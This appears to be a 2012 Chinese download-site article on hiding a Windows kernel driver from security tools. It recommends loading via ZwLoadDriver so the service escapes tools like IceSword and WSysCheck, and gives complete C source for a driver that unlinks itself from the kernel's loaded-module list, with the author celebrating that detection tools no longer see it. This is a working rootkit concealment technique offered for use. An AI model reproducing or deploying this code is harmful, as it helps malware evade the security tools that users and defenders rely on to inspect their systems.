西西軟件園多重安全檢測下載網(wǎng)站、值得信賴的軟件下載站!
軟件
軟件
文章
搜索

首頁編程開發(fā)其它知識 → 驅(qū)動的加載、隱藏模塊和服務(wù)

驅(qū)動的加載、隱藏模塊和服務(wù)

相關(guān)軟件相關(guān)文章發(fā)表評論 來源:3600safe時間:2012/2/23 15:01:31字體大。A-A+

作者:3600safe點擊:127次評論:6次標簽: 驅(qū)動

  • 類型:U 盤工具大小:601KB語言:中文 評分:8.2
  • 標簽:
立即下載

1隱藏服務(wù)
驅(qū)動的加載一般有三種方式:
OpenSCManager
ZwLoadDriver
ZwSetSystemInformation
這里我們用ZwLoadDriver來加載驅(qū)動程序.便可以隱藏服務(wù)了,沒試其他,冰刃和WSysCheck就看不到我們的服務(wù)了

2隱藏模塊
摘鏈,注意加載驅(qū)動用ZwLoadDriver不要用OpenSCManager,否則如下圖一樣:

驅(qū)動代碼比較簡單

01 #include "ntddk.h"
02 typedef unsigned long DWORD;
03 typedef DWORD* PDWORD;
04 typedef struct _DRIVER_DATA
05 {
06 LIST_ENTRY listEntry;
07 DWORD unknown1;
08 DWORD unknown2;
09 DWORD unknown3;
10 DWORD unknown4;
11 DWORD unknown5;
12 DWORD unknown6;
13 DWORD unknown7;
14 UNICODE_STRING path;
15 UNICODE_STRING name;
16 } DRIVER_DATA;
17 VOID OnUnload( IN PDRIVER_OBJECT pDriverObject )
18 {
19 DbgPrint("OnUnload called.");
20 }
21 NTSTATUS DriverEntry( IN PDRIVER_OBJECT pDriverObject, IN PUNICODE_STRING theRegistryPath )
22 {
23
24 DRIVER_DATA* driverData;
25 driverData = *((DRIVER_DATA**)((DWORD)pDriverObject + 20));
26 if( driverData != NULL )
27 {
28 *((PDWORD)driverData->listEntry.Blink) = (DWORD)driverData->listEntry.Flink;
29 driverData->listEntry.Flink->Blink = driverData->listEntry.Blink;
30 DbgPrint("Sucessfull.\n");
31 }
32 pDriverObject->DriverUnload = OnUnload;
33 return STATUS_SUCCESS;
34 }

加載驅(qū)動后,我們用DbgView看到打出的Sucessfull就知道我們的驅(qū)動已經(jīng)運行了...然后用冰刃的查看模塊,服務(wù)..好像沒什么動靜...he8he8
下面的圖是用OpenSCManager加載驅(qū)動的效果....所以不要用OpenSCManager加載,用ZwLoadDriver加載,這樣冰刃才查不出來

    usb驅(qū)動
    (15)usb驅(qū)動
    接口作為電腦很重要的一個端口沒有驅(qū)動的話是沒法工作的,特別是筆記本電腦外接鍵盤鼠標都需要用到接口,不過有時候我們會遇到主板的驅(qū)動程序光盤中沒有提供驅(qū)動,這時候我們就需要根據(jù)自己的型號找到對應(yīng)的驅(qū)動程序。當然我們可以下載萬能驅(qū)動,可以支持大部分的設(shè)備。西西為大家收集了一些設(shè)備的驅(qū)動程序,大家可以根據(jù)自己的需要下載。...更多>>
    萬能顯卡
    (240)萬能顯卡
    萬能顯卡驅(qū)動適用于所有顯卡安裝驅(qū)動所用,稱之為萬能顯卡驅(qū)動。顯卡驅(qū)動是硬件所對應(yīng)的軟件,你裝電腦時那幫你裝電腦的人不是給了你很多碟子的嗎,那些就是驅(qū)動程序,其中必然有一張是顯卡的驅(qū)動程序。先要確定你的顯卡什么牌子型號的,如果記不得了,就打開機箱看那個豎插在主板上的較大板子一般顯卡有很大的散熱片或風扇上的型號品牌。如果是集成的顯卡在主板上看不到前面說的那樣的電路板,就看主板上的型號品牌,記下來。但是...更多>>

    相關(guān)評論

    閱讀本文后您有什么感想? 已有人給出評價!

    • 8 喜歡喜歡
    • 3 頂
    • 1 難過難過
    • 5 囧
    • 3 圍觀圍觀
    • 2 無聊無聊

    熱門評論

    最新評論

    發(fā)表評論 查看所有評論(6)

    昵稱:
    表情: 高興 可 汗 我不要 害羞 好 下下下 送花 屎 親親
    字數(shù): 0/500 (您的評論需要經(jīng)過審核才能顯示)